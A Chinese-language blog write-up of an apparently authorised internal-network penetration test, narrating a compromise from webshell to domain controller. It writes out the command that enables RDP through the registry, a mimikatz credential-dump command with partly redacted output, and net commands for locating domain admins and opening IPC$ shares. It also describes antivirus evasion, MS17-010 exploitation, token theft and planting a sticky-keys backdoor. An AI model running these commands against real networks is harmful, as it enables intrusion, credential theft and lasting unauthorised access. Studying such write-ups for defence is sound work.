Bypass趋势杀毒一步步打穿内网拿下域控

2021-02-03 10:11:14 浏览数 (1)

前言

最近接了很多广告,也没输出啥好文章给兄弟们,之前搞实战的时候也没写过实战相关的文章,这次写了一篇实战域渗透的,都是常规操作,主要还是内网渗透那些东西。由于是项目,全程打码,话不多说兄弟们看文章就完事了。

Pypass趋势杀毒一步步打穿内网拿下域控

内网信息搜集

首先是通过上传拿到了一个 webshell:

然后通过 Powershell 弹到我 C2 上发现是存在域环境,域名是:**ta.org.** !

查看当前域内机器:

发现域控有多两台:

Ping 域控机器名得到域控 IP:192.168.30.110、192.168.30.111

tasklist /svc 发现当前机器存在趋势杀毒:

之后通过免杀上线到我 C2:

内网域渗透第一天

上线后做好免杀然后通过 Nbtscan 发现内网存活:

通过梼杌的插件提权失败后,然后我是先上传了 frp 先把流量代理出来:

代理成功:

然后 Metasploit 设置 socks5 代理:

通过扫了一遍内网 smb 存活发现内网 03 机器很多,猜测有 ms17010:

看来没猜错果然中奖了:

先打 08 这台把:192.168.30.116

但是失败了!

发现打 03 成功:192.168.30.8

没办法 03 只能通过执行命令,MSF 的模块没得 32 位的 Payload,我添加了一个 asp*** 用户进去:

然后开启了他的 3389 :

代码语言:javascript复制
REG ADD "HKLMSYSTEMCurrentControlSetControlTerminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

成功登录到他远程桌面:

通过信息搜集发现这台机器不出网:(这里说一下,测试出网大家可以使用 NC 看看目标是否出网,测试 TCP、UDP、DNS 这三种即可,因为如果底层的协议都不出网,你在测试一些其他协议出网也毫无意义!)

由于 03 服务器不能复制文件,我只能把文件通过映射到他的磁盘来传输文件:

老思路先克隆个 administrator 用户过来:

克隆后发现之前 administrator 之前执行了一些命令:

不管了,先用 procdump 把密码读出来:

然后拖会本地后删除文件:

最后使用 mimikatz 进行解密:

代码语言:javascript复制
mimikatz.exe "sekurlsa::minidump lsass.dmp" "log" "sekurlsa::logonpasswords"

得到了 administrator 的明文密码:

代码语言:javascript复制
   * Username : Administrator
   * Domain   : *****DB
   * Password : *****@dba

然后直接登录administrator 的机器:

然后把我之前创建的 asp***** 用户删除:

通过搜集信息的时候发现了 11 年这台机器的 rdp 记录:

但是连接不上:

然后再这台机器上没找到可利用的信息后,随手留了一个粘滞键的后门:

之后扫描内网 HTTP 服务的时候发现了一个投影仪系统,弱口令撸了进去:admin:admin

由于搞站的时候比较晚了,搞到这我就去睡觉了。

内网域渗透第二天

就在昨晚睡着,做了一个梦,梦到我上课迟到了,然后回到座位上看到我作业上一个 Metasploit 的 Shell,然后就醒了!

睡醒后的,我再一次拿起 MSF 打了一遍 08 的机器,结果成功了?卧槽这个梦牛逼啊!

这尼玛渗透有时候就需要天时地利人和!

通过 Ping google 发现 192.168.30.116 能出网:

然后创建个管理员用户 asp****:

登录到他远程桌面:

随后克隆用户 adminisrtrator:

随后做了免杀让他上线到我 CS:

之后抓到了一个域用户的 hash:

代码语言:javascript复制
beacon> logonpasswords
[*] Tasked beacon to run mimikatz's sekurlsa::logonpasswords command
[ ] host called home, sent: 438866 bytes
[ ] received output:

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : ****DSM$
Domain            : ****A
Logon Server      : (null)
Logon Time        : 2021/1/27 上午 12:22:29
SID               : S-1-5-20
  msv :  
   [00000003] Primary
   * Username : ****ADSM$
   * Domain   : ****A
   * NTLM     : 0a4b2******************************
   * SHA1     : 623e30**************************

这个时候由于我们是一个工作组用户,得想办法搞到一个域用户!

通过 MSF 的令牌窃取:

发现失败了:

回头看看 Win 10 这台,使用 getsystem 直接提取成功了:

之后通过注入 System 进程成功反弹一个 System 的shell:

之后发现进程里还有其他的域用户:

再注入进程得到一个域用户的 shell:

最后抓一下密码:

然后通过定位域管 :

代码语言:javascript复制
shell net group "domain admins" /domain

发现域管的账号是 A013,发现也在进程里,直接注入进程上线成功:

先查看域控是那些机器:

代码语言:javascript复制
shell net group "domain controllers" /domain

发现域控有两台!然后通过 Ping 域控的主机名:****DC01、****DC02

得到域控的 IP:192.168.30.110、192.168.30.111

然后和域控建立 IPC$:

代码语言:javascript复制
shell net use \****DC01ipc$
shell net use \****DC02ipc$

有域管进程就好办了,直接窃取令牌,直接拿域控横向上线:(因为域管本来就可以直接和任何机器建立连接,并且都是最大权限,所以不需要密码)

成功上线域控:

最后通过注入进程成功上线域管理员账号:

至此域渗透完结:

他内网其实还有很多机器还可以打,一些 Web 比如 Tomcat,Weblogic,Jboss 一些漏洞还是可以利用打下来的,由于我的目标就是拿到域控所以就不深入了。

0 人点赞